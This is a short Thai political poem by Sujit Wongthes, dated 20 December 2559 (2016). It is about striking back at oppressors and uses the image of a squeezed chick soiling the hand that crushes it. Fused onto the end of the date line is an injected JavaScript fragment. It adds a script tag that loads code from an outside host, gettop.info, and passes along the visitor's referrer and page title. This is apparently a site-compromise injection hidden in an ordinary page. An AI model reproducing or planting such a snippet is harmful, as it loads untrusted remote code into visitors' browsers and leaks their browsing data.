ลูกไก่ถูกบีบ

 

คุกคามเขาเขาก็ตามคุกคามบ้าง

อย่ามาอ้างตัวบทยกกฎหมาย

บีบลูกไก่ในกำมือมุ่งทำลาย

ก่อนตายไก่ตดขี้รดมือ

 

สุจิตต์ วงษ์เทศ

อังคาร 20 ธันวาคม 2559d.getElementsByTagName(‘head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;